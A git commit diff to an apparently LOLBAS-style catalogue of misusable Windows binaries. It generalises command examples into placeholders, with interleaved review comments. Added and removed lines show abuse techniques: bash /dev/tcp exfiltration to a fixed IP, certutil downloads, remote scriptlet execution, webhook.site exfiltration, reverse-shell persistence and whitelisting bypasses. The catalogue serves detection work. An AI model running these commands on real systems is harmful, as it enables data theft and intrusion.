Generalising file paths and urls, see #10 (#422)

This commit is contained in:
Wietze 2025-01-28 11:15:01 +00:00 committed by GitHub
parent e62749f81a
commit a79893e7ad
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
196 changed files with 555 additions and 758 deletions

View File

@ -4,7 +4,7 @@ Description: Tool used for installation of AppX/MSIX applications on Windows 10
Author: 'Wade Hickey'
Created: 2020-12-02
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
- Command: start ms-appinstaller://?source={REMOTEURL:.exe}
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
Usecase: Download file from Internet
Category: Download
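Review bot: the `.exe` hint in `{REMOTEURL:.exe}` contradicts the file's own description, "Tool used for installation of AppX/MSIX applications", and the entry's Description that the handler "attempts to load/install a package from the URL"; the URI handler consumes a package or an .appinstaller manifest, not a bare executable, so `{REMOTEURL:.msix}` (or a bare `{REMOTEURL}` if the extension does not matter for the download behaviour) would describe the entry more accurately.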

View File

@ -4,7 +4,7 @@ Description: Schedule periodic tasks
Author: 'Freddie Barr-Smith'
Created: 2019-09-20
Commands:
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
- Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
Description: Create a recurring task to execute every day at a specific time.
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
Category: Execute
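Review bot: while this Command line is being rewritten, the Usecase line kept as context, "Create a recurring task, to eg. to keep reverse shell session(s) alive", still carries the doubled "to eg. to"; fixing it here ("e.g. to keep ...") avoids a second touch of the same entry.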

View File

@ -1,7 +1,7 @@
---
Name: Atbroker.exe
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: ATBroker.exe /start malware
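Review bot: this hunk only unquotes the Author value, which is unrelated to the commit subject of generalising paths and URLs; the same cosmetic change recurs in many files of this commit, so it would be cleaner as a separate commit, or at least mentioned in the commit message, so that a reader of the history does not have to inspect every file to find out whether anything substantive changed.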

View File

@ -1,11 +1,11 @@
---
Name: Bash.exe
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
- Command: bash.exe -c "{CMD}"
Description: Executes executable from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
- Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
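Review bot: the hard-coded endpoint in `cat {PATH:.zip} > /dev/tcp/192.168.1.10/24` is left in place although the commit generalises paths and URLs; bash's `/dev/tcp` pseudo-path takes host and port, so `/24` here means port 24, not a netmask, which reads as if it was copied from CIDR notation. A host and port placeholder, defined in #10 alongside the path ones, would make the entry consistent and remove the ambiguity.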
@ -31,8 +31,8 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
- Command: bash.exe -c "{CMD}"
Description: Executes executable from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
@ -43,8 +43,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml
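Review bot: this hunk drops the empty `Code_Sample:` / `- Code:` stanza, and the same removal is repeated across the other files in this commit; make sure the YAML schema, the site generator and any validation in CI treat `Code_Sample` as optional rather than required-but-empty, otherwise the cleaned files will fail validation. It is worth a line in the commit message too, since the title only mentions paths and URLs.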

View File

@ -1,7 +1,7 @@
---
Name: Bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
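Review bot: only the Author quoting changed here, yet the retained Command line `bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe ...` still carries the concrete `c:\data\playfolder\...` paths, which is exactly what the commit sets out to generalise; either apply `{PATH_ABSOLUTE}` placeholders to this entry too or state why it is excluded. The line also chains five bitsadmin invocations without separators, so it is worth checking that it renders as the multi-step sequence it is.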

View File

@ -4,7 +4,7 @@ Description: Used for installing certificates
Author: 'Ensar Samil'
Created: 2021-10-07
Commands:
- Command: certoc.exe -LoadDLL "C:\test\calc.dll"
- Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
Description: Loads the target DLL file
Usecase: Execute code within DLL file
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
- Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1}
Description: Downloads text formatted files
Usecase: Download scripts, webshells etc.
Category: Download
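Review bot: `{REMOTEURL:.ps1}` narrows the entry to PowerShell scripts while the Description line retained as context says "Downloads text formatted files" and the Usecase says "Download scripts, webshells etc."; a bare `{REMOTEURL}`, or a hint that matches the description, keeps the entry as general as the text claims, and detection content derived from it would not be biased towards one extension.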

View File

@ -1,18 +1,18 @@
---
Name: CertReq.exe
Description: Used for requesting and managing certificates
Author: 'David Middlehurst'
Author: David Middlehurst
Created: 2020-07-07
Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal
- Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
Usecase: Upload
Category: Upload
Privileges: User
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\certreq.exe
- Path: C:\Windows\SysWOW64\certreq.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml
- IOC: certreq creates new files

View File

@ -1,46 +1,46 @@
---
Name: Certutil.exe
Description: Windows binary used for handling certificates
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
Description: Download and save executable to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
Description: Download and save executable to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -encode inputFileName encodedOutputFileName
- Command: certutil -encode {PATH} {PATH:.base64}
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -decode encodedInputFileName decodedOutputFileName
- Command: certutil -decode {PATH:.base64} {PATH}
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
- Command: certutil -decodehex {PATH:.hex} {PATH}
Description: Command to decode a hexadecimal-encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
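Review bot: in `certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt` the literal stream name `ttt` survives the generalisation; since the ADS name is arbitrary here, a descriptive name like the `script.vbs` / `file.exe` stream names used in other entries of this commit, or a placeholder, would be consistent. The OperatingSystem context lines in this hunk also still spell "Windows vista" in lower case, which could be fixed while the file is open.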
@ -49,8 +49,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml

View File

@ -4,28 +4,28 @@ Description: The command-line interpreter in Windows
Author: Ye Yint Min Thu Htut
Created: 2019-06-26
Commands:
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
Description: Add content to an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmd.exe - < fakefile.doc:payload.bat
- Command: cmd.exe - < {PATH}:payload.bat
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
Privileges: User
MitreID: T1059.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: type \\webdav-server\folder\file.ext > C:\Path\file.ext
- Command: type {PATH_SMB} > {PATH_ABSOLUTE}
Description: Downloads a specified file from a WebDAV server to the target file.
Usecase: Download/copy a file from a WebDAV server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: type C:\Path\file.ext > \\webdav-server\folder\file.ext
- Command: type {PATH_ABSOLUTE} > {PATH_SMB}
Description: Uploads a specified file to a WebDAV server.
Usecase: Upload a file to a WebDAV server
Category: Upload
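Review bot: the placeholder name `PATH_SMB` in `type {PATH_SMB} > {PATH_ABSOLUTE}` and `type {PATH_ABSOLUTE} > {PATH_SMB}` does not match the Description lines, which say the file is fetched from or uploaded to a "WebDAV server"; a UNC path is served over SMB or, through the WebClient service, over WebDAV, and the distinction matters for detection (port 445 traffic versus HTTP). Either the placeholder definition in #10 should state that it covers UNC paths over either transport, or a WebDAV-specific placeholder is needed.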

View File

@ -1,7 +1,7 @@
---
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cmdkey /list

View File

@ -1,7 +1,7 @@
---
Name: cmdl32.exe
Description: Microsoft Connection Manager Auto-Download
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-08-26
Commands:
- Command: cmdl32 /vpn /lan %cd%\config

View File

@ -1,10 +1,10 @@
---
Name: Cmstp.exe
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
- Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
- Command: cmstp.exe /ni /s {REMOTEURL:.inf}
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AWL Bypass

View File

@ -1,10 +1,10 @@
---
Name: Colorcpl.exe
Description: Binary that handles color management
Author: 'Arjan Onwezen'
Author: Arjan Onwezen
Created: 2023-06-26
Commands:
- Command: colorcpl file.txt
- Command: colorcpl {PATH}
Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\.
Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment.
Category: Copy

View File

@ -1,17 +1,17 @@
---
Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: Ialle Teixeira
Created: 2020-09-04
Commands:
- Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
- Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload
Privileges: User
MitreID: T1567
OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload
- Command: ConfigSecurityPolicy.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
@ -23,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml
- IOC: ConfigSecurityPolicy storing data into alternate data streams.

View File

@ -4,8 +4,8 @@ Description: Console Window host
Author: Wietze Beukema
Created: 2022-04-05
Commands:
- Command: "conhost.exe calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
- Command: conhost.exe {CMD}
Description: Execute a command line with conhost.exe as parent process
Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
- Command: conhost.exe --headless {CMD}
Description: Execute a command line with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
Category: Execute
Privileges: User

View File

@ -1,10 +1,10 @@
---
Name: Control.exe
Description: Binary used to launch controlpanel items in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
- Command: control.exe {PATH_ABSOLUTE}:evil.dll
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
- Command: control.exe {PATH_ABSOLUTE:.cpl}
Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
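Review bot: the new Description "Execute .cpl file. A CPL is a DLL file with CPlApplet export function)" keeps the unbalanced closing parenthesis from the line it replaces; since the line is rewritten anyway, drop the ")" or add the missing opening one.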

View File

@ -1,18 +1,18 @@
---
Name: Csc.exe
Description: Binary file used by .NET Framework to compile C# code
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: csc.exe -out:Output.exe File.cs
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to Output.exe.
- Command: csc.exe -out:{PATH:.exe} {PATH:.cs}
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: csc -target:library File.cs
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in File.cs and output the compiled version to a DLL file.
- Command: csc -target:library {PATH:.cs}
Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
@ -25,8 +25,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml

View File

@ -1,10 +1,10 @@
---
Name: Cscript.exe
Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
- Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
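Review bot: the Description context line directly after the edited Command still reads "Use cscript.exe to exectute a Visual Basic script"; fix the "exectute" typo while this entry is being touched.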

View File

@ -1,7 +1,7 @@
---
Name: CustomShellHost.exe
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
Author: 'Wietze Beukema'
Author: Wietze Beukema
Created: 2021-11-14
Commands:
- Command: CustomShellHost.exe

View File

@ -1,10 +1,10 @@
---
Name: DataSvcUtil.exe
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Author: 'Ialle Teixeira'
Author: Ialle Teixeira
Created: 2020-12-01
Commands:
- Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
- Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload

View File

@ -4,7 +4,7 @@ Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Created: 2020-06-28
Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen
Usecase: Download arbitrary files from a web server
Category: Download
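Review bot: `C:\Windows\Temp` in `set "SYSTEMROOT=C:\Windows\Temp"` stays hard-coded while the URL is generalised; that is presumably intentional because the SYSTEMROOT override determines where desktopimgdownldr writes the downloaded file, but the Description "Downloads the file and sets it as the computer's lockscreen" does not say so, so a reader cannot tell whether the directory is a placeholder candidate or part of the technique. A short note in the Description would settle it and also tells detection engineers which path to watch.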
@ -13,8 +13,6 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\desktopimgdownldr.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml

View File

@ -1,8 +1,8 @@
---
Name: DeviceCredentialDeployment.exe
Description: Device Credential Deployment
Author: 'Elliot Killick'
Created: '2021-08-16'
Author: Elliot Killick
Created: 2021-08-16
Commands:
- Command: DeviceCredentialDeployment
Description: Grab the console window handle and set it to hidden

View File

@ -1,10 +1,10 @@
---
Name: Dfsvc.exe
Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL Bypass
@ -19,8 +19,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:

View File

@ -4,8 +4,8 @@ Description: Binary that package existing files into a cabinet (.cab) file
Author: Tamir Yehuda
Created: 2020-08-08
Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
- Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab
Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an Alternate Data Stream.
Category: ADS
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
Tags:
- Type: Compression
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine.
- Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
Description: Download and compress a remote file and store it in a CAB file on local machine.
Usecase: Download and compress into a cab file.
Category: Download
Privileges: User
@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Tags:
- Type: Compression
- Command: diantz /f directives.ddf
- Command: diantz /f {PATH:.ddf}
Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
Usecase: Bypass command-line based detections
Category: Execute
@ -34,8 +34,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml

View File

@ -1,10 +1,10 @@
---
Name: Diskshadow.exe
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: diskshadow.exe /s c:\test\diskshadow.txt
- Command: diskshadow.exe /s {PATH:.txt}
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
Category: Dump
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Command: diskshadow> exec calc.exe
- Command: diskshadow> exec {PATH:.exe}
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml

View File

@ -1,10 +1,10 @@
---
Name: Dnscmd.exe
Description: A command-line interface for managing DNS servers
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
Usecase: Remotely inject dll to dns server
Category: Execute
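Review bot: the server name `dc1.lab.int` in `dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}` remains a lab-specific literal even though the DLL path was generalised; as the Description says the command targets a DC, a host placeholder defined in #10 would fit the commit's intent better than a fictitious FQDN.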
@ -28,7 +28,6 @@ Resources:
- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Acknowledgement:
- Person: Shay Ber
Handle:
- Person: Dimitrios Slamaris
Handle: '@dim0x69'
- Person: Nikhil SamratAshok

View File

@ -1,45 +1,45 @@
---
Name: Esentutl.exe
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
- Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
Description: Copies the source VBS file to the destination VBS file.
Usecase: Copies files from A to B
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
- Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
